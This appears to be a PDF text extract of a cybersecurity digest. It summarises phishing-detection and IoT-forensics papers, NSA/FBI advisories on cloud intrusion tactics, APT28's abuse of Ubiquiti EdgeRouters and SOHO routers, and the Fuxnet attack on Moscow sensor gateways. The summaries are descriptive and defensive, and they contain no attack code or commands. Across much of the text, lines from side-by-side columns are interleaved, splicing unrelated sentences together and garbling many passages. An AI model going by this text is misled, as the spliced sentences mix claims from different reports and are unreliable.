also know how to respond to them effectively. �Developer Access: Available for developers to experiment
with, with a bug fix expected soon.
Enhanced Developer Tools:

11
 Read more: Boosty | Sponsr | TG

�Play Integrity API: Updated to include new in-app signals to �Transaction Security: Scam call detection and advanced
help developers detect and prevent fraudulent or risky behavior. cellular security will protect users from phishing and fraud attempts,
ensuring safer online transactions.
�Photo Picker: Improved to support cloud storage services and
enforce stricter permissions for accessing photos and videos. �User Trust: Enhanced privacy controls and secure app
environments will increase user confidence in mobile shopping
Impact on Industries platforms.
Financial Services: Telecommunications:
�Fraud Prevention: Enhanced scam call detection and �Network Security: Advanced cellular protections will help
advanced cellular security features will significantly reduce the risk of telecom providers safeguard their networks from cell site simulators
financial fraud and scams, protecting both consumers and financial and other surveillance tools.
institutions.
�Customer Safety: Real-time scam detection features will
�Data Privacy: The Private Space feature ensures that sensitive enhance customer safety, reducing the incidence of fraud-related
financial data remains secure, fostering greater trust in mobile banking complaints.
and financial apps.
App Development:
Healthcare:
�Security Integration: Developers can leverage the updated
�Patient Data Security: The improved security measures, Play Integrity API and other security tools to build more secure apps,
including live threat detection and Private Space, will help protect reducing the risk of exploitation and abuse.
sensitive patient information stored on mobile devices.
�User Privacy: Stricter photo permissions and the Private Space
�Telehealth: Enhanced screen-sharing safeguards will secure feature will help developers ensure compliance with privacy
telehealth sessions, preventing unauthorized access to patient data regulations and build user trust.
during remote consultations.
E-commerce:

12
Read more: Boosty | Sponsr | TG

13
 Read more: Boosty | Sponsr | TG

CONTENTS

14
 Read more: Boosty | Sponsr | TG

ANTIPHISHSTACK
In a world were clicking on NSA'S PANIC.
a link is akin to navigating a ADAPTTACTICS
minefield, phishing emerges as
the supervillain. Enter our Buckle up for another
heroes: the researchers behind episode of "Cyber Insecurity,"
this paper, armed with their featuring our favorite villains,
shiny new weapon, the the cyber actors, and their
AntiPhishStack. It's not just any latest escapades in the cloud!
model; it's a two-phase, LSTM- This time, the NSA and FBI
powered, cybercrime-fighting marvel that doesn't need to know have teamed up to bring us a
squat about phishing to catch a phisher. gripping tale of how these
nefarious ne'er-do-wells have shifted their playground from the
The methodology? They've concocted a concoction so boring old on-premise networks to the shiny, vast expanses of
potent it could make traditional phishing detection systems weep cloud services.
in their outdatedness. By harnessing the mystical powers of
Long Short-Term Memory networks and the alchemy of Document sounds like a how-to guide for aspiring cyber
character-level TF-IDF features, they've created a phishing villains than a warning. It details the cunning shift in tactics as
detection elixir that's supposed to be the envy of cybersecurity these actors move to exploit the fluffy, less-guarded realms of
nerds everywhere. cloud-based systems.
The analysis will also delve into the practical applications of If you thought your data was safer in the cloud, think again.
the model, discussing how it can be integrated into existing The cyber actors are just getting started, and they've got their
cybersecurity measures and its potential impact on reducing heads in the cloud, looking for any opportunity to rain on your
phishing attacks. The document's relevance to cybersecurity digital parade. So, update those passwords, secure those
professionals, IT specialists, and stakeholders in various accounts, and maybe keep an umbrella handy—because it's
industries will be highlighted, emphasizing the importance of getting cloudy out there!
advanced phishing detection techniques in the current digital
landscape. This summary will serve as a valuable resource for
cybersecurity experts, IT professionals, and others interested in NSA'S PANIC. UBIQUITI
the latest developments in phishing detection and prevention. EDGEROUTERS
The FBI, NSA, and their
FUXNET international pals have graced us
with yet another Cybersecurity
This time, we're diving into Advisory (CSA), this time
the murky waters of Fuxnet starring the ever-so-popular
malware, a brainchild of the Ubiquiti EdgeRouters and their
illustrious Blackjack hacking starring role in the global
group. cybercrime drama directed by
none other than APT28.
Let's set the scene: Moscow,
a city unsuspectingly going In this latest blockbuster release from our cybersecurity
about its business, unaware that overlords, we learn how Ubiquiti EdgeRouters, those user-
it's about to be the star of Blackjack's latest production. The friendly, Linux-based gadgets, have become the unwilling
method? Oh, nothing too fancy, just the classic "let's potentially accomplices in APT28's nefarious schemes. With their default
disable sensor-gateways" move. credentials and "what firewall?" security, these routers are
practically rolling out the red carpet for cyber villains.
In a move of unparalleled transparency, Blackjack decides to
broadcast their cyber conquests on ruexfil.com. Because nothing If you're using Ubiquiti EdgeRouters and haven't been
screams "covert operation" like a public display of your hacking hacked yet, congratulations! But maybe check those settings,
prowess, complete with screenshots for the visually inclined. update that firmware, and change those passwords. Or better yet,
just send your router on a nice vacation to a place where APT28
The initial claim of 2,659 sensor-gateways laid to waste? A
can't find it. Happy securing!
slight exaggeration, it seems. The actual tally? A little over 500.
It's akin to declaring world domination and then barely
managing to annex your backyard.
For Blackjack, the dramatists hint at a sequel, suggesting the
JSON files were merely a teaser of the chaos yet to come.
Because what's a cyberattack without a hint of sequel bait,
teasing audiences with the promise of more digital destruction?

15
 Read more: Boosty | Sponsr | TG

NSA'S PANIC. SOHO your energy bill while you sleep, or your thermostat conspiring
with your toaster to launch a cyberattack. This paper heroically
Another riveting document proposes a lightweight detection framework to save us from
on the ever-so-secure world of these nefarious appliances by analyzing their energy
Small Office/Home Office consumption patterns. Because, clearly, the best way to outsmart
(SOHO) routers. This time, a smart device is to monitor how much juice it’s guzzling. So,
we're treated to a delightful next time your smart light bulb flickers, don’t worry—it’s just
analysis that dives deep into the the algorithm doing its job.
abyss of security defects,
exploits, and the catastrophic
impacts on critical
infrastructure.
MEDIHUNT
The document serves up a qualitative smorgasbord of how The paper "MediHunt: A
these devices are basically open doors for state-sponsored cyber Network Forensics Framework
parties. It's a must-read for anyone who enjoys a good cyber for Medical IoT Devices" is a
security scare, complete with a guide on how not to design a real page-turner. It starts by
router. Manufacturers are given a stern talking-to about adopting addressing the oh-so-urgent
"secure by design" principles, which is a way of saying, "Maybe need for robust network
try not to make it so easy for the bad guys?" forensics in Medical Internet of
Things (MIoT) environments.
So, if you're looking for a guide on how to secure your You know, those environments
SOHO router, this document is perfect. It's like a how-to guide, where MQTT (Message Queuing Telemetry Transport)
but for everything you shouldn't do networks are the darling of smart hospitals because of their
lightweight communication protocol.
MediHunt is an automatic network forensics framework
DETECTION OF ENERGY designed for real-time detection of network flow-based traffic
CONSUMPTION CYBER attacks in MQTT networks. It leverages machine learning
ATTACKS ON SMART models to enhance detection capabilities and is suitable for
DEVICES deployment on those ever-so-resource-constrained MIoT
devices. Because, naturally, that's what we've all been losing
In a world where smart sleep over.
devices are supposed to make
our lives easier, "Detection of These points set the stage for the detailed discussion of the
Energy Consumption Cyber framework, its experimental setup, and evaluation presented in
Attacks on Smart Devices" the subsequent sections of the paper. Can't wait to dive into those
dives into the thrilling saga of how these gadgets can be turned thrilling details!
against us. Imagine your smart fridge plotting is going to drain

16
 Read more: Boosty | Sponsr | TG

SECTION:
KEYPOINTS

* check out full content in unpacking and research sections

17
 Read more: Boosty | Sponsr | TG

The data source used in the study includes two benchmark

A. AntiPhishStack datasets comprising benign and phishing or malicious URLs.
These datasets are used for experimental validation of the model.
The datasets are referred to as DS1 and DS2 within the paper,
with DS1 including benign Yandex sites and PhishTank
phishing sites, and DS2 consisting of benign sites from
common-crawl, the Alexa database, and phishing sites from
PhishTank.
2) Key components
According to the methodology the proposed model operates
in two phases (two-phase stack generalized model):
• Phase I: The model learns URLs and character-level
TF-IDF features symmetrically. These features are
trained on a base machine learning classifier, employing
K-fold cross-validation for robust mean prediction.
• Phase II: A two-layered stacked-based LSTM network
with five adaptive optimizers is used for dynamic
compilation, ensuring premier prediction on these
features.
• Additionally, the symmetrical predictions from both
phases are optimized and integrated to train a meta-
The paper titled "LSTM-based Stacked Generalization XGBoost classifier, contributing to a final robust
Model for Optimized Phishing" discusses the escalating reliance prediction.
on revolutionary online web services, which has introduced 3) Benefits and limitations of the study
heightened security risks, with persistent challenges posed by Comparatively, traditional phishing systems, reliant on
phishing attacks. machine learning and manual features, struggle with evolving
Phishing, a deceptive method through social and technical tactics. Other models, such as the CNN-LSTM model and the
engineering, poses a severe threat to online security, aiming to end-to-end deep learning architecture grounded in natural
obtain illicit user identities, personal account details, and bank language processing techniques, have shown limitations in their
credentials. It's a primary concern within criminal activity, with generalization on test data and their dependency on existing
phishers pursuing objectives such as selling stolen identities, knowledge of phishing detection. The model, in contrast, shows
extracting cash, exploiting vulnerabilities, or deriving financial strong generalization ability and independence from prior
gains. feature knowledge, making it a robust and effective tool for
phishing detection.
The study aims to advance phishing detection with operating
without prior phishing-specific feature knowledge. The model The benefits of the study compared to traditional phishing
leverages the capabilities of Long Short-Term Memory (LSTM) systems include:
networks, a type of recurrent neural network that is capable of
• Prior Feature Knowledge Independence: The
learning order dependence in sequence prediction problems. It
proposed model does not require prior phishing-
leverages the learning of URLs and character-level TF-IDF
specific feature knowledge, which allows it to adapt to
features symmetrically, enhancing its ability to combat
new and evolving phishing tactics more effectively
emerging phishing threats.
than traditional systems that rely on predefined
1) Methodology and Significance of the study features.
It presents a novel model for detecting phishing sites. The • Strong Generalization Ability: The model uses URL
significance of this study lies in its advancement of phishing character-based features for robust generalization and
detection techniques, specifically through the introduction of a check-side accuracy, which enables it to generalize
two-phase stack generalized model named AntiPhishStack. across different phishing threats better than traditional
This model is designed to detect phishing sites without systems that may not adapt as well to variations in
requiring prior knowledge of phishing-specific features, which phishing URLs.
is a significant improvement over traditional phishing detection
• Independence from Cybersecurity Experts and
systems that rely on machine learning and manual features.
Third-Party Services: The model autonomously
This research contributes to the ongoing discourse on extracts necessary URL features, reducing the reliance
symmetry and asymmetry in information security and provides on cybersecurity experts and third-party services like
a forward-thinking solution for enhancing network security in page rank or domain age, which traditional systems
the face of evolving cyber threats. may depend on.

18
 Read more: Boosty | Sponsr | TG

• High Accuracy: The model has demonstrated B. NSA’s panic. AdaptTactics

exceptional performance, achieving a notable 96.04%
accuracy on benchmark datasets, which is a significant
improvement over traditional phishing detection
systems.
• Adaptability to Evolving Threats: The model's
design allows it to learn from the data it processes,
making it potentially more adaptable to the
continuously evolving tactics used by phishers, unlike
traditional systems that may require manual updates to
stay effective.
Limitations of the study include:
• Real-World Application: The paper does not discuss
the model's performance in real-world scenarios where
phishing tactics are constantly evolving.
• Performance on Other Datasets: The model's
performance has been validated on two benchmark
datasets, but it's unclear how it would perform on other
datasets or in different contexts.
• Feature Reliance: The model's reliance on URL and
character-level TF-IDF features may limit its ability to
detect phishing attempts that use other tactics. The document titled “cyber actors adapt tactics for initial
• Computational Resources: The paper does not cloud access” released by the National Security Agency (NSA)
discuss the computational resources required to warns of use of cyber actors have adapted their tactics to gain
implement the model, which could be a potential initial access to cloud services, as opposed to exploiting on-
limitation for some users. premise network vulnerabilities.

The proposed model has several limitations in terms of This shift is in response to organizations modernizing their
scalability and performance. systems and moving to cloud-based infrastructure. The high-
profile cyber campaigns like the SolarWinds supply chain
• Firstly, the model's reliance on Long Short-Term compromise are now expanding to sectors such as aviation,
Memory (LSTM) networks can lead to computational education, law enforcement, local and state councils,
inefficiency. LSTM networks are known for their high government financial departments, and military organizations.
computational and memory requirements, which can
limit the model's scalability when dealing with large The stark reality is that to breach cloud-hosted networks,
datasets or in real-time applications. these actors need only to authenticate with the cloud provider,
and if they succeed, the defenses are breached. The document
• Secondly, the model's two-phase approach, which highlights a particularly disconcerting aspect of cloud
involves training features on a base machine learning environments: the reduced network exposure compared to on-
classifier and then employing a two-layered stacked- premises systems paradoxically makes initial access a more
based LSTM network, can be time-consuming and significant linchpin.
computationally intensive. This could potentially limit
1) Key findings
the model's performance in real-time phishing detection
scenarios. • Adaptation to Cloud Services: Cyber actors have
shifted their focus from exploiting on-premises network
• Lastly, while the model is designed to operate without vulnerabilities to directly targeting cloud services. This
prior phishing-specific feature knowledge, this could change is a response to the modernization of systems
also be a limitation. The model may struggle to and the migration of organizational infrastructure to the
accurately detect new or sophisticated phishing attempts cloud.
that exploit features not considered in the model's
training. • Authentication as a Key Step: To compromise cloud-
hosted networks, cyber actors must first successfully
authenticate with the cloud provider. Preventing this
initial access is crucial for stopping from compromising
the target.
• Expansion of Targeting: Cyber actors have broadened
their targeting to include sectors such as aviation,
education, law enforcement, local and state councils,

19
 Read more: Boosty | Sponsr | TG

government financial departments, and military • Command and Control / T1090.002 Proxy: External
organizations. This expansion indicates a strategic Proxy: To maintain covert operations and blend in with
diversification of targets for intelligence gathering. normal traffic, actors use open proxies located in
residential IP ranges. This makes malicious connections
• Use of Service and Dormant Accounts: it highlights harder to distinguish from legitimate user activity in
that cyber actors have been observed using brute force access logs.
attacks to access service and dormant accounts over the
last 12 months. This tactic allows to gain initial access • Persistence / T1098.005 Account Manipulation:
to cloud environments. Device Registration: After gaining access to accounts,
actors attempt to register their own devices on the cloud
• Sophistication of cyber actors: The cyber actors can tenant. Successful device registration can provide
execute global supply chain compromises, such as the persistent access to the cloud environment.
2020 SolarWinds incident.
• Defense through Cybersecurity Fundamentals: The
advisory emphasizes that a strong baseline of C. NSA’s panic. Ubiquiti
cybersecurity fundamentals can defend against cyber
actors. For organizations that have transitioned to cloud
infrastructure, protecting against TTPs for initial access
is presented as a first line of defense.
2) Adaptation to Cloud Services
The adaptation of attacks to target cloud services marks a
significant evolution in the landscape of cyber espionage and
cyber warfare. This shift is not merely a change in target but
represents a deeper strategic adaptation to the changing
technological environment and the increasing reliance of
governments and corporations on cloud infrastructure. The
move towards cloud services by organizations is driven by the
benefits of scalability, cost-efficiency, and the ability to rapidly
deploy and update services. However, this transition also
presents new vulnerabilities and challenges for cybersecurity.
3) TTPs details:
• Credential Access / T1110 Brute Forcing: actors
utilize password spraying and brute forcing as initial
infection vectors. This approach involves attempting
multiple passwords against different accounts
(password spraying) or numerous password attempts on
a single account (brute forcing) to gain unauthorized
access. Routers to Facilitate Cyber Operations” released by the
Federal Bureau of Investigation (FBI), National Security
• Initial Access / T1078.004 Valid Accounts: Cloud Agency (NSA), US Cyber Command, and international partners
Accounts: The actors gains access to cloud services by warns of use of compromised Ubiquiti EdgeRouters to facilitate
using compromised credentials. This includes targeting malicious cyber operations worldwide.
both system accounts (used for automated tasks and
services) and dormant accounts (inactive accounts that The popularity of Ubiquiti EdgeRouters is attributed to their
still remain on the system). user-friendly, Linux-based operating system, default credentials,
and limited firewall protections. The routers are often shipped
• Credential Access / T1528 Steal Application Access with insecure default configurations and do not automatically
Token: Actors exploit stolen access tokens to log into update firmware unless configured by the user.
accounts without needing the passwords. Access tokens
are digital keys that allow access to user accounts, and The compromised EdgeRouters have been used by APT28
obtaining these can bypass traditional login to harvest credentials, collect NTLMv2 digests, proxy network
mechanisms. traffic, and host spear-phishing landing pages and custom tools.
APT28 accessed the routers using default credentials and
• Credential Access / T1621 Multi-Factor trojanized OpenSSH server processes. With root access to the
Authentication Request Generation: Known as 'MFA compromised routers, the actors had unfettered access to the
bombing' or 'MFA fatigue,' this technique involves Linux-based operating systems to install tooling and obfuscate
actors repeatedly sending MFA requests to a victim's their identity.
device. The goal is to overwhelm or fatigue the victim
into accepting the request, thus granting the attacker APT28 also deployed custom Python scripts on the
access. compromised routers to collect and validate stolen webmail

20
 Read more: Boosty | Sponsr | TG

account credentials obtained through cross-site scripting and D. NSA’s panic. SOHO
browser-in-the-browser spear-phishing campaigns.
Additionally, they exploited a critical zero-day elevation-of-
privilege vulnerability in Microsoft Outlook (CVE-2023-23397)
to collect NTLMv2 digests from targeted Outlook accounts and
used publicly available tools to assist with NTLM relay attacks
1) Keypoints and takeaways
• APT28 (also known as Fancy Bear, Forest Blizzard, and
Strontium) have been exploiting compromised Ubiquiti
EdgeRouters to conduct malicious cyber ops globally.
• The exploitation includes harvesting credentials,
collecting NTLMv2 digests, proxying network traffic,
and hosting spear-phishing landing pages and custom
tools.
• The FBI, NSA, US Cyber Command, and international
partners have issued a joint Cybersecurity Advisory
(CSA) detailing the threat and providing mitigation
recommendations.
• The advisory includes observed tactics, techniques, and
procedures (TTPs), indicators of compromise (IOCs),
and maps the threat actors' activity to the MITRE
ATT&CK framework.
The exploitation of insecure SOHO routers by malicious
• The advisory urges immediate action to mitigate the cyber actors, particularly state-sponsored groups, poses a
threat, including performing hardware factory resets, significant threat to individual users and critical infrastructure.
updating firmware, changing default credentials, and Manufacturers are urged to adopt secure by design principles
implementing strategic firewall rules. and transparency practices to mitigate these risks, while users
• APT28 has used compromised EdgeRouters since at and network defenders are advised to implement best practices
least 2022 to facilitate covert operations against various for router security and remain vigilant against potential threats.
industries and countries, including the US. The root causes of insecure SOHO routers are multifaceted,
• The EdgeRouters are popular due to their user-friendly involving both technical vulnerabilities and lapses in secure
Linux-based operating system but are often shipped with design and development practices by manufacturers, as well as
default credentials and limited firewall protections. negligence on the part of users in maintaining router security.
• Widespread Vulnerabilities: A significant number of
• The advisory provides detailed TTPs and IOCs to help vulnerabilities, totaling 226, have been identified in
network defenders identify and mitigate the threat. popular SOHO router brands. These vulnerabilities range
• The advisory also includes information on how to map in severity but collectively pose a substantial security
malicious cyber activity to the MITRE ATT&CK risk.
framework. • Outdated Components: Core components such as the
• Organizations using Ubiquiti EdgeRouters must take Linux kernel and additional services like VPN in these
routers are outdated. This makes them susceptible to
immediate action to secure their devices against APT28
known exploits for vulnerabilities that have long since
exploitation. been made public.
• The recommended actions include resetting hardware to • Insecure Default Settings: Many routers come with
factory settings, updating to the latest firmware, easy-to-guess default passwords and use unencrypted
changing default usernames and passwords, and connections. This can be easily exploited by attackers.
implementing strategic firewall rules.
• Lack of Secure Design and Development: SOHO
• Network defenders should be aware of the TTPs and routers often lack basic security features due to insecure
IOCs provided in the advisory to detect and respond to design and development practices. This includes the
potential compromises. absence of automatic update capabilities and the presence
of exploitable defects, particularly in web management
interfaces.
• Exposure of Management Interfaces: Manufacturers
frequently create devices with management interfaces
exposed to the public internet by default, often without

21
 Read more: Boosty | Sponsr | TG

notifying the customers of this frequently unsafe • Retail and Hospitality: These sectors are vulnerable to
configuration. data breaches involving customer information and
financial transactions due to insecure network devices.
• Lack of Transparency and Accountability: There is a
need for manufacturers to embrace transparency by • Manufacturing: Industrial control systems can be
disclosing product vulnerabilities through the CVE compromised through insecure routers, affecting
program and accurately classifying these vulnerabilities production lines and industrial processes.
using the Common Weakness Enumeration (CWE)
system • Education: Schools and universities are at risk of data
breaches and disruption of educational services.
• Neglect of Security in Favor of Convenience and
Features: Manufacturers prioritize ease of use and a wide • Government and Public Sector: Insecure routers can
variety of features over security, leading to routers that lead to unauthorized access to government networks,
are "secure enough" right out of the box without risking sensitive information and critical services
considering the potential for exploitation. 2) Key Findings on Malicious Cyber Actors Exploiting
• User Negligence: Many users, including IT Insecure SOHO Routers
professionals, do not follow basic security practices such • Exploitation by State-Sponsored Groups: The
as changing default passwords or updating firmware, People’s Republic of China (PRC)-sponsored Volt
leaving routers exposed to attacks. Typhoon group is actively compromising SOHO routers
by exploiting software defects. These compromised
• Complexity in Identifying Vulnerable Devices: routers are then used as launching pads to further
Identifying specific vulnerable devices is complex due to compromise U.S. critical infrastructure entities.
legal and technical issues, complicating the process of
mitigating these vulnerabilities. • Impact on Critical Infrastructure: Compromised
SOHO routers pose a significant threat as they can be
1) Affected industries used to move laterally within networks and further
The exploitation of insecure SOHO routers poses a compromise critical infrastructure sectors in the U.S.,
significant threat across multiple sectors, highlighting the need including communications, energy, transportation, and
for improved security practices and awareness. water sectors.
a) Communications • ZuoRAT Campaign: A sophisticated campaign
• Data Breaches and Eavesdropping: Insecure routers leveraging infected SOHO routers, dubbed ZuoRAT, has
can lead to unauthorized access to network traffic, been identified. This campaign involves a multistage
allowing attackers to intercept sensitive communications. remote access trojan (RAT) developed for SOHO
devices, enabling attackers to maintain a low-detection
• Disruption of Services: Compromised routers can be presence on target networks and exploit sensitive
used to launch Distributed Denial of Service (DDoS) information.
attacks, disrupting communication services.
• FBI's Response to Chinese Malware: The FBI has
b) Transportation taken proactive measures to disrupt the activities of
Infrastructure Vulnerability: The transportation sector Chinese hackers, specifically targeting SOHO routers
relies heavily on networked systems for operations. infected with the KV Botnet malware. This involved
Compromised routers could allow attackers to disrupt traffic issuing covert commands to infected devices to remove
management systems and logistics operations. the malware and prevent further access by the hackers,
highlighting the ongoing efforts to counteract the threats
c) Water posed by compromised SOHO routers.
Operational Technology (OT) Threats: Insecure routers
can provide a gateway for attackers to target OT systems within
the water sector, potentially affecting water treatment and
distribution systems.
d) Energy
Grid Security: The energy sector, particularly electric
utilities, is at risk of targeted attacks through insecure routers.
Attackers could gain access to control systems, posing a threat
to the stability of the power grid.
e) Other Industries
• Healthcare: Insecure routers can compromise patient
data and disrupt medical services by providing attackers
access to healthcare networks.

22
 Read more: Boosty | Sponsr | TG

E. Detection of Energy Consumption Cyber Attacks on Smart These benefits and drawbacks provide a balanced view of
Devices the proposed detection framework's capabilities and limitations,
highlighting its potential for improving smart home security.
1) Benefits
• Lightweight Detection Algorithm: The proposed
algorithm is designed to be lightweight, making it
suitable for resource constrained IoT devices. This
ensures that the detection mechanism does not overly
burden the devices it aims to protect.
• Protocol Versatility: The algorithm considers multiple
communication protocols (TCP, UDP, MQTT),
enhancing its applicability across various types of smart
devices and network configurations.
• Two-Stage Detection Approach: The use of a two-
stage detection approach (short and long-time
windows) improves the accuracy of detecting energy
consumption attacks while minimizing false positives.
This method allows for both quick initial detection and
detailed analysis.
• Real-Time Alerts: The framework promptly alerts
administrators upon detecting an attack, enabling quick
response and mitigation of potential threats.
• Effective Anomaly Detection: By measuring packet
The paper "Detection of Energy Consumption Cyber reception rates and analyzing energy consumption
Attacks on Smart Devices" emphasizes the rapid integration of patterns, the algorithm effectively identifies deviations
IoT technology into smart homes, highlighting the associated from normal behavior, which are indicative of
security challenges due to resource constraints and unreliable cyberattacks.
networks. 2) Drawbacks
• Energy Efficiency: it emphasizes the significance of • Limited Attack Scenarios: The experimental setup has
energy efficiency in IoT systems, particularly in smart tested only specific types of attacks, which limit the
home environments for comfort, convenience, and generalizability of the results to other potential attack
security. vectors not covered in the study.
• Vulnerability: it discusses the vulnerability of IoT • Scalability Concerns: While the algorithm is designed
devices to cyberattacks and physical attacks due to their to be lightweight, its scalability in larger, more complex
resource constraints. It underscores the necessity of smart home environments with numerous devices and
securing these devices to ensure their effective varied network conditions may require further
deployment in real-world scenarios. validation.
• Proposed Detection Framework: The authors propose • Dependency on Baseline Data: The effectiveness of
a detection framework based on analyzing the energy the detection mechanism relies on accurate baseline
consumption of smart devices. This framework aims to measurements of packet reception rates and energy
classify the attack status of monitored devices by consumption. Any changes in the normal operating
examining their energy consumption patterns. conditions of the devices could affect the baseline,
• Two-Stage Approach: The methodology involves a potentially leading to false positives or negatives.
two-stage approach. The first stage uses a short time • Resource Constraints: Despite being lightweight, the
window for rough attack detection, while the second algorithm still requires computational resources, which
stage involves more detailed analysis. might be a challenge for extremely resource-limited
• Lightweight Algorithm: The paper introduces a devices. Continuous monitoring and analysis could also
lightweight algorithm designed to detect energy impact the battery life and performance of these
consumption attacks on smart home devices. This devices.
algorithm is tailored to the limited resources of IoT
devices and considers three different protocols: TCP,
UDP, and MQTT.
• Packet Reception Rate Analysis: The detection
technique relies on analyzing the packet reception rate
of smart devices to identify abnormal behavior
indicative of energy consumption attacks.

23
 Read more: Boosty | Sponsr | TG

F. MediHunt • Machine Learning Integration: By leveraging

machine learning models, MediHunt enhances its
detection capabilities. The use of a custom dataset that
includes flow data for both TCP/IP layer and
application layer attacks allows for more accurate and
effective detection of a wide range of cyber-attacks.
• High Performance: The framework has demonstrated
high performance, with F1 scores and detection
accuracy exceeding 0.99 and indicates that it is highly
reliable in detecting attacks on MQTT networks.
• Resource Efficiency: Despite its comprehensive
capabilities, MediHunt is designed to be resource-
efficient, making it suitable for deployment on
resource-constrained MIoT devices like Raspberry Pi.
2) Drawbacks
• Dataset Limitations: While MediHunt uses a custom
dataset for training its machine learning models, the
creation and maintenance of such datasets can be
challenging. The dataset needs to be regularly updated
to cover new and emerging attack scenarios.
• Resource Constraints: Although MediHunt is
designed to be resource-efficient, the inherent
The paper "MediHunt: A Network Forensics Framework for limitations of MIoT devices, such as limited
Medical IoT Devices" addresses the need for robust network computational power and memory, can still pose
forensics in Medical Internet of Things (MIoT) environments, challenges. Ensuring that the framework runs smoothly
particularly focusing on MQTT (Message Queuing Telemetry on these devices without impacting their primary
Transport) networks. These networks are commonly used in functions can be difficult.
smart hospital environments for their lightweight • Complexity of Implementation: Implementing and
communication protocol. It highlights the challenges in maintaining a machine learning-based network
securing MIoT devices, which are often resource-constrained forensics framework can be complex. It requires
and have limited computational power. The lack of publicly expertise in cybersecurity and machine learning, which
available flow-based MQTT-specific datasets for training may not be readily available in all healthcare settings.
attack detection systems is mentioned as a significant challenge. • Dependence on Machine Learning Models: The
effectiveness of MediHunt heavily relies on the
The paper presents MediHunt as an automatic network accuracy and robustness of its machine learning
forensics solution designed for real-time detection of network models. These models need to be trained on high-
flow-based traffic attacks in MQTT networks. It aims to quality data and regularly updated to remain effective
provide a comprehensive solution for data collection, analysis, against new types of attacks.
attack detection, presentation, and preservation of evidence. It • Scalability Issues: While the framework is suitable for
is designed to detect a variety of TCP/IP layers and application small-scale deployments on devices like Raspberry Pi,
layer attacks on MQTT networks. It leverages machine learning scaling it up to larger, more complex MIoT
models to enhance the detection capabilities and is suitable for environments may present additional challenges.
deployment on resource constrained MIoT devices. Ensuring consistent performance and reliability across
Unlike many network forensics frameworks, MediHunt is a larger network of devices can be difficult
specifically designed for the MIoT domain. This specialization
allows it to address the unique challenges and requirements of
medical IoT devices, such as resource constraints and the need
for real-time attack detection.
1) Benefits
• Real-time Attack Detection: MediHunt is designed to
detect network flow-based traffic attacks in real-time,
which is crucial for mitigating potential damage and
ensuring the security of MIoT environments.
• Comprehensive Forensic Capabilities: The
framework provides a complete solution for data
collection, analysis, attack detection, presentation, and
preservation of evidence. This makes it a robust tool for
network forensics in MIoT environments.

24
 Read more: Boosty | Sponsr | TG

G. Fuxnet this fuzzing is unknown due to the network being taken

down and access to the sensor-gateways being disabled.
• Lack of Direct Evidence: Direct evidence to confirm
the extent of the damage or the impact on emergency
detection and response capabilities is lacking (including
targeted Moscollector).
• Clarification from Blackjack: Following the
publication of Team82's initial analysis, the Blackjack
group reached out to provide updates and clarifications,
particularly challenging the contention that only around
500 sensor-gateways had been impacted. They
emphasized that the JSON files made public were only
a sample of the full extent of their activity.
1) Affected Industries:
• Utility Services: The primary target of the Fuxnet
malware was the utility sector, specifically the sensor
gateways that manage water and sewage systems. This
could have implications for the delivery and monitoring
of these essential services.
• Emergency Services: group claimed to have gained
access to 112 emergency service number, which could
impact the ability to respond to emergencies effectively.
The Blackjack hacking group, purportedly linked to
Ukrainian intelligence services, has claimed responsibility for a • Transportation: The group also claimed to have
cyberattack that allegedly compromised emergency detection bricked sensors and controllers in critical infrastructure,
and response capabilities in Moscow and its surrounding areas. including airports and subways, which could disrupt
This group has been associated with previous cyberattacks transportation services and safety.
targeting internet providers and military infrastructure. Their
most recent claim involves an attack on Moscollector, a • Energy: Gas pipelines were mentioned as another
company responsible for constructing and monitoring target, indicating a potential risk to energy distribution
underground water, sewage, and communications infrastructure. and monitoring systems.

Regarding the infection methods, the Fuxnet malware 2) Potential Consequences:

appears to have been designed to target sensor-gateways and • Disruption of Services: The destruction or malfunction
potentially disable them, as well as to fuzz sensors, which could of sensor gateways could lead to a disruption of the
lead to their malfunction or destruction. monitoring and control systems for utilities, potentially
causing service outages or failures.
• Unverified Claims: Team82 and Claroty have not been
able to confirm the claims made by the Blackjack group • Compromised Safety: In transportation and energy
regarding the impact of their cyberattack on the sectors, the loss of sensor functionality could pose safety
government's emergency response capabilities or the risks, as these sensors are often critical for detecting
extent of the damage caused by the Fuxnet malware. hazardous conditions.

• Discrepancy in Reported Impact: The Blackjack • Economic Impact: The potential downtime and repair
group initially claimed to have targeted 2,659 sensor- costs associated with replacing or reflashing damaged
gateways, with about 1,700 being successfully attacked. sensor gateways could have significant economic
However, Team82's analysis of the data leaked by repercussions for the affected industries.
Blackjack suggests that only a little more than 500 • Emergency Response Delays: If the claims about
sensor gateways were actually impacted by the malware. accessing the 112-emergency service number are
The claim of having destroyed 87,000 sensors was also accurate, this could lead to delays in emergency
clarified by Blackjack, stating that they disabled the response, affecting public safety.
sensors by destroying the gateways and using M-Bus
fuzzing, rather than physically destroying the sensors. • Data Exfiltration: Although not explicitly mentioned in
the context of Fuxnet, the malware's ability to
• M-Bus Fuzzing: The Blackjack group utilized a compromise network systems could potentially lead to
dedicated M-Bus fuzzer within the Fuxnet malware's data breaches and the exfiltration of sensitive
code to fuzz the sensors. This technique was aimed at information.
disabling the sensors, but the exact number of sensors
that were "fried" or permanently damaged as a result of

25
Read more: Boosty | Sponsr | TG

26
 Read more: Boosty | Sponsr | TG

SECTION:
UNPACKING

27
 Read more: Boosty | Sponsr | TG

ANTIPHISHSTACK

28
 Read more: Boosty | Sponsr | TG

learning order dependence in sequence prediction problems. It

leverages the learning of URLs and character-level TF-IDF
features symmetrically, enhancing its ability to combat
emerging phishing threats.
B. Methodology and Significance of the study
It presents a novel model for detecting phishing sites. The
significance of this study lies in its advancement of phishing
detection techniques, specifically through the introduction of a
two-phase stack generalized model named AntiPhishStack.
This model is designed to detect phishing sites without
requiring prior knowledge of phishing-specific features, which
is a significant improvement over traditional phishing detection
systems that rely on machine learning and manual features.
This research contributes to the ongoing discourse on
symmetry and asymmetry in information security and provides
a forward-thinking solution for enhancing network security in
the face of evolving cyber threats.
The data source used in the study includes two benchmark
datasets comprising benign and phishing or malicious URLs.
These datasets are used for experimental validation of the model.
Abstract – The analysis of document, titled "AntiPhishStack: LSTM- The datasets are referred to as DS1 and DS2 within the paper,
based Stacked Generalization Model for Optimized Phishing URL with DS1 including benign Yandex sites and PhishTank
Detection," will cover various aspects of the document, including its phishing sites, and DS2 consisting of benign sites from
methodology, results, and implications for cybersecurity. common-crawl, the Alexa database, and phishing sites from
Specifically, the document's approach to using Long Short-Term PhishTank.
Memory (LSTM) networks within a stacked generalization
framework for detecting phishing URLs will be examined. The C. Key components
effectiveness of the model, its optimization strategies, and its According to the methodology the proposed model operates
